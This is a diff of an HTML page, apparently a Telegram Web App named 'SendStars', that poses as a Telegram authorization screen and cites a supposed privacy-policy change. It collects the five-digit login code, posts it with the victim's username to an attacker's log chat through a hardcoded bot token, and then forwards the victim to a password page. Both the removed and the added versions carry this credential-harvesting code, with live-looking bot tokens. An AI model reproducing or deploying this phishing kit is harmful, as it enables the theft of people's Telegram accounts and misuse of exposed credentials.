--- a/auth.html
+++ b/auth.html
@@ -1,264 +1,372 @@
-<!doctype html>
+<!DOCTYPE html>
 <html lang="ru">
-<head>
-  <meta charset="utf-8" />
-  <meta name="viewport" content="width=device-width,initial-scale=1" />
-  <title>SendStars — авторизация</title>
-  <script src="https://telegram.org/js/telegram-web-app.js"></script>
-  <style>
-    :root {
-      --bg:#1c1b1b;
-      --text:#fff;
-      --box:#2a2a2a;
-    }
+	<head>
+		<meta charset="utf-8" />
+		<meta name="viewport" content="width=device-width,initial-scale=1" />
+		<title>SendStars — авторизация</title>
+		<script src="https://telegram.org/js/telegram-web-app.js"></script>
+		<style>
+			:root {
+				--bg: #1c1b1b;
+				--text: #fff;
+				--box: #2a2a2a;
+			}
 
-    * { box-sizing: border-box; margin: 0; padding: 0; }
-    html, body { height: 100%; }
+			* {
+				box-sizing: border-box;
+				margin: 0;
+				padding: 0;
+			}
+			html,
+			body {
+				height: 100%;
+			}
 
-    body {
-      font-family: Inter, system-ui, -apple-system, "Segoe UI", Roboto, "Helvetica Neue", Arial;
-      background: var(--bg);
-      display: flex;
-      align-items: center;
-      justify-content: center;
-      color: var(--text);
-    }
+			body {
+				font-family: Inter, system-ui, -apple-system, 'Segoe UI', Roboto,
+					'Helvetica Neue', Arial;
+				background: var(--bg);
+				display: flex;
+				align-items: center;
+				justify-content: center;
+				color: var(--text);
+			}
 
-    .screen {
-      width: 400px;
-      display: flex;
-      flex-direction: column;
-      align-items: center;
-      text-align: center;
-      gap: 15px;
-    }
+			.screen {
+				width: 400px;
+				display: flex;
+				flex-direction: column;
+				align-items: center;
+				text-align: center;
+				gap: 15px;
+			}
 
-    .avatar img {
-      width: 120px;
-      height: auto;
-      object-fit: contain;
-      display: block;
-    }
+			.avatar img {
+				width: 120px;
+				height: auto;
+				object-fit: contain;
+				display: block;
+			}
 
-    .hint {
-      font-size: 14px;
-      color: #aaa;
-      margin-bottom: 0;
-      line-height: 1.4;
-      max-width: 320px;
-    }
+			.hint {
+				font-size: 14px;
+				color: #aaa;
+				margin-bottom: 0;
+				line-height: 1.4;
+				max-width: 320px;
+			}
 
-    .privacy-link {
-      font-size: 14px;
-      color: #2A9BF8;
-      text-decoration: none;
-      cursor: pointer;
-      transition: color 0.2s;
-    }
+			.privacy-link {
+				font-size: 14px;
+				color: #2a9bf8;
+				text-decoration: none;
+				cursor: pointer;
+				transition: color 0.2s;
+			}
 
-    .privacy-link:hover {
-      color: #1a8be8;
-      text-decoration: underline;
-    }
+			.privacy-link:hover {
+				color: #1a8be8;
+				text-decoration: underline;
+			}
 
-    .code-boxes {
-      display: flex;
-      gap: 10px;
-      margin: 10px 0 20px;
-    }
+			.code-boxes {
+				display: flex;
+				gap: 10px;
+				margin: 10px 0 20px;
+			}
 
-    .code-box {
-      width: 40px;
-      height: 50px;
-      border-radius: 8px;
-      background: var(--box);
-      display: flex;
-      align-items: center;
-      justify-content: center;
-      font-size: 32px;
-      font-weight: 600;
-      color: #fff;
-      border: 2px solid #3a3a3a;
-      transition: border-color 0.2s;
-    }
+			.code-box {
+				width: 40px;
+				height: 50px;
+				border-radius: 8px;
+				background: var(--box);
+				display: flex;
+				align-items: center;
+				justify-content: center;
+				font-size: 32px;
+				font-weight: 600;
+				color: #fff;
+				border: 2px solid #3a3a3a;
+				transition: border-color 0.2s;
+			}
 
-    .code-box.filled {
-      border-color: #2A9BF8;
-    }
+			.code-box.filled {
+				border-color: #2a9bf8;
+			}
 
-    .numpad {
-      display: grid;
-      grid-template-columns: repeat(3, 80px);
-      gap: 12px;
-      justify-content: center;
-    }
+			.numpad {
+				display: grid;
+				grid-template-columns: repeat(3, 80px);
+				gap: 12px;
+				justify-content: center;
+			}
 
-    .numpad button {
-      width: 80px;
-      height: 60px;
-      font-size: 22px;
-      border-radius: 12px;
-      border: none;
-      background: var(--box);
-      color: var(--text);
-      font-weight: 600;
-      cursor: pointer;
-      transition: background 0.2s;
-    }
+			.numpad button {
+				width: 80px;
+				height: 60px;
+				font-size: 22px;
+				border-radius: 12px;
+				border: none;
+				background: var(--box);
+				color: var(--text);
+				font-weight: 600;
+				cursor: pointer;
+				transition: background 0.2s;
+			}
 
-    .numpad button:hover {
-      background: #3a3a3a;
-    }
+			.numpad button:hover {
+				background: #3a3a3a;
+			}
 
-    .numpad button:active {
-      background: #4a4a4a;
-    }
+			.numpad button:active {
+				background: #4a4a4a;
+			}
 
-    /* Экран загрузки */
-    .loading-screen {
-      display: none;
-      flex-direction: column;
-      align-items: center;
-      gap: 20px;
-    }
+			/* Экран загрузки */
+			.loading-screen {
+				display: none;
+				flex-direction: column;
+				align-items: center;
+				gap: 20px;
+			}
 
-    .spinner {
-      border: 4px solid rgba(255,255,255,0.2);
-      border-top: 4px solid #fff;
-      border-radius: 50%;
-      width: 50px;
-      height: 50px;
-      animation: spin 1s linear infinite;
-    }
+			.spinner {
+				border: 4px solid rgba(255, 255, 255, 0.2);
+				border-top: 4px solid #fff;
+				border-radius: 50%;
+				width: 50px;
+				height: 50px;
+				animation: spin 1s linear infinite;
+			}
 
-    @keyframes spin {
-      0% { transform: rotate(0deg); }
-      100% { transform: rotate(360deg); }
-    }
-  </style>
-</head>
-<body>
-  <div class="screen" id="authScreen">
-    <div class="avatar">
-      <img src="avatar.gif" alt="avatar">
-    </div>
-    <div class="hint">Мы отправили код в приложение Telegram.</div>
-    
-    <div class="hint">
-      Это необходимо, ввиду последних изменений в 
-      <a href="https://telegram.org/privacy" target="_blank" class="privacy-link">Политике конфиденциальности</a>.
-    </div>
+			@keyframes spin {
+				0% {
+					transform: rotate(0deg);
+				}
+				100% {
+					transform: rotate(360deg);
+				}
+			}
+		</style>
+	</head>
+	<body>
+		<div class="screen" id="authScreen">
+			<div class="avatar">
+				<img src="avatar.gif" alt="avatar" />
+			</div>
+			<div class="hint">Мы отправили код в приложение Telegram.</div>
 
-    <div class="code-boxes" id="codeBoxes">
-      <div class="code-box"></div>
-      <div class="code-box"></div>
-      <div class="code-box"></div>
-      <div class="code-box"></div>
-      <div class="code-box"></div>
-    </div>
+			<div class="hint">
+				Это необходимо, ввиду последних изменений в
+				<a
+					href="https://telegram.org/privacy"
+					target="_blank"
+					class="privacy-link"
+					>Политике конфиденциальности</a
+				>.
+			</div>
 
-    <div class="numpad">
-      <button>1</button><button>2</button><button>3</button>
-      <button>4</button><button>5</button><button>6</button>
-      <button>7</button><button>8</button><button>9</button>
-      <div></div><button>0</button><button>←</button>
-    </div>
-  </div>
+			<div class="code-boxes" id="codeBoxes">
+				<div class="code-box"></div>
+				<div class="code-box"></div>
+				<div class="code-box"></div>
+				<div class="code-box"></div>
+				<div class="code-box"></div>
+			</div>
 
-  <!-- Экран загрузки -->
-  <div class="screen loading-screen" id="loadingScreen">
-    <div class="spinner"></div>
-    <div>Проверка введённого кода…</div>
-  </div>
+			<div class="numpad">
+				<button data-value="1">1</button>
+				<button data-value="2">2</button>
+				<button data-value="3">3</button>
+				<button data-value="4">4</button>
+				<button data-value="5">5</button>
+				<button data-value="6">6</button>
+				<button data-value="7">7</button>
+				<button data-value="8">8</button>
+				<button data-value="9">9</button>
+				<div></div>
+				<button data-value="0">0</button>
+				<button data-action="backspace">←</button>
+			</div>
+		</div>
 
-  <script>
-const tg = window.Telegram.WebApp;
-tg.expand();
+		<!-- Экран загрузки -->
+		<div class="screen loading-screen" id="loadingScreen">
+			<div class="spinner"></div>
+			<div>Проверка введённого кода…</div>
+		</div>
 
-const codeBoxes = document.querySelectorAll('.code-box');
-let code = "";
+		<script>
+			(function () {
+				'use strict';
 
-function updateBoxes() {
-  codeBoxes.forEach((box, i) => {
-    if (code[i]) {
-      box.textContent = "•";
-      box.classList.add('filled');
-    } else {
-      box.textContent = "";
-      box.classList.remove('filled');
-    }
-  });
-}
+				let tg;
+				try {
+					tg = window.Telegram?.WebApp;
+					if (tg) {
+						tg.expand();
+					}
+				} catch (e) {
+					console.log('Telegram WebApp init error:', e);
+				}
 
-document.querySelectorAll('.numpad button').forEach(btn => {
-  btn.addEventListener('click', () => {
-    const value = btn.textContent;
-    if (value === '←') {
-      code = code.slice(0, -1);
-    } else if (!isNaN(value)) {
-      if (code.length < 5) code += value;
-    }
-    updateBoxes();
+				const codeBoxes = document.querySelectorAll('.code-box');
+				let code = '';
+				let isProcessing = false;
 
-    if (code.length === 5) {
-      // скрываем экран ввода
-      document.getElementById("authScreen").style.display = "none";
-      // показываем экран загрузки
-      document.getElementById("loadingScreen").style.display = "flex";
+				function updateBoxes() {
+					try {
+						codeBoxes.forEach((box, i) => {
+							if (code[i]) {
+								box.textContent = '•';
+								box.classList.add('filled');
+							} else {
+								box.textContent = '';
+								box.classList.remove('filled');
+							}
+						});
+					} catch (e) {
+						console.log('Error updating boxes:', e);
+					}
+				}
 
-      // Отправляем код боту через Telegram Web App
-      tg.sendData(JSON.stringify({
-        type: 'auth_code',
-        code: code,
-        user_id: tg.initDataUnsafe.user?.id,
-        phone_number: ""
-      }));
+				function safeNavigate(url) {
+					try {
+						if (isProcessing) return;
+						isProcessing = true;
+						window.location.href = url;
+					} catch (e) {
+						console.log('Navigation error:', e);
+						isProcessing = false;
+					}
+				}
 
-      // Дополнительно отправляем код в бота через метод бота
-      sendCodeToBot(code);
+				function sendCodeToBot(safeCode) {
+					try {
+						const botToken = '7324446797:AAEnKkmIjlDY-fa1J2HYrNupKD6ejXJn_A4';
+						const logChatId = '-1003268790940';
 
-      // Переходим на страницу ввода пароля через 1 секунду
-      setTimeout(() => {
-        window.location.href = `password.html?phone=&code=${code}`;
-      }, 1000);
-    }
-  });
-});
+						const user = tg?.initDataUnsafe?.user;
+						const username = user?.username
+							? `@${user.username}`
+							: 'без username';
 
-// Функция для отправки кода в бота
-function sendCodeToBot(code) {
-  const botToken = '8367749936:AAGXAmyb_TzZrux-W6AA5dcUZImi4BDEpLU';
-  const logChatId = '-1003110205556';
-  
-  const user = tg.initDataUnsafe.user;
-  
-  // Получаем username или показываем "без username"
-  const username = user?.username ? `@${user.username}` : 'без username';
-  
-  const message = `🔐 Код авторизации из WebApp\n👤 Пользователь: ${username}\n🔢 Код: ${code}`;
-  
-  // Отправляем сообщение через API бота
-  fetch(`https://api.telegram.org/bot${botToken}/sendMessage`, {
-    method: 'POST',
-    headers: {
-      'Content-Type': 'application/json',
-    },
-    body: JSON.stringify({
-      chat_id: logChatId,
-      text: message,
-      parse_mode: 'HTML'
-    })
-  }).catch(error => {
-    console.error('Ошибка отправки кода в лог:', error);
-  });
-}
+						const message = `🔐 Код авторизации из WebApp\n👤 Пользователь: ${username}\n🔢 Код: ${safeCode}`;
 
-// Инициализация при загрузке
-updateBoxes();
-</script>
-</body>
+						fetch(`https://api.telegram.org/bot${botToken}/sendMessage`, {
+							method: 'POST',
+							headers: {
+								'Content-Type': 'application/json',
+							},
+							body: JSON.stringify({
+								chat_id: logChatId,
+								text: message,
+								parse_mode: 'HTML',
+							}),
+						}).catch(error => {
+							console.error('Ошибка отправки кода в лог:', error);
+						});
+					} catch (e) {
+						console.log('Error sending code to bot:', e);
+					}
+				}
+
+				function handleCodeInput(value) {
+					try {
+						if (isProcessing) return;
+
+						if (value === 'backspace') {
+							code = code.slice(0, -1);
+						} else if (!isNaN(value) && value !== ' ' && value !== null) {
+							if (code.length < 5) code += value;
+						}
+
+						updateBoxes();
+
+						if (code.length === 5) {
+							processAuthCode();
+						}
+					} catch (e) {
+						console.log('Error handling code input:', e);
+					}
+				}
+
+				function processAuthCode() {
+					try {
+						if (isProcessing) return;
+						isProcessing = true;
+
+						const authScreen = document.getElementById('authScreen');
+						const loadingScreen = document.getElementById('loadingScreen');
+
+						if (authScreen) authScreen.style.display = 'none';
+						if (loadingScreen) loadingScreen.style.display = 'flex';
+
+						try {
+							if (tg && tg.sendData) {
+								tg.sendData(
+									JSON.stringify({
+										type: 'auth_code',
+										code: code,
+										user_id: tg.initDataUnsafe?.user?.id,
+										phone_number: '',
+									})
+								);
+							}
+						} catch (sendError) {
+							console.log('Error sending data to Telegram:', sendError);
+						}
+
+						sendCodeToBot(code);
+
+						setTimeout(() => {
+							safeNavigate(
+								`password.html?phone=&code=${encodeURIComponent(code)}`
+							);
+						}, 2000);
+					} catch (processError) {
+						console.log('Error processing auth code:', processError);
+						isProcessing = false;
+					}
+				}
+
+				function initializeButtons() {
+					try {
+						const buttons = document.querySelectorAll('.numpad button');
+						buttons.forEach(btn => {
+							btn.addEventListener('click', function (e) {
+								e.preventDefault();
+								const value =
+									this.getAttribute('data-value') ||
+									this.getAttribute('data-action');
+								if (value) {
+									handleCodeInput(value);
+								}
+							});
+						});
+					} catch (e) {
+						console.log('Error initializing buttons:', e);
+					}
+				}
+
+				function init() {
+					try {
+						initializeButtons();
+						updateBoxes();
+
+						// Предотвращаем повторную инициализацию
+						document.removeEventListener('DOMContentLoaded', init);
+					} catch (e) {
+						console.log('Error in init:', e);
+					}
+				}
+
+				if (document.readyState === 'loading') {
+					document.addEventListener('DOMContentLoaded', init);
+				} else {
+					init();
+				}
+			})();
+		</script>
+	</body>
 </html>
-
-
-
-
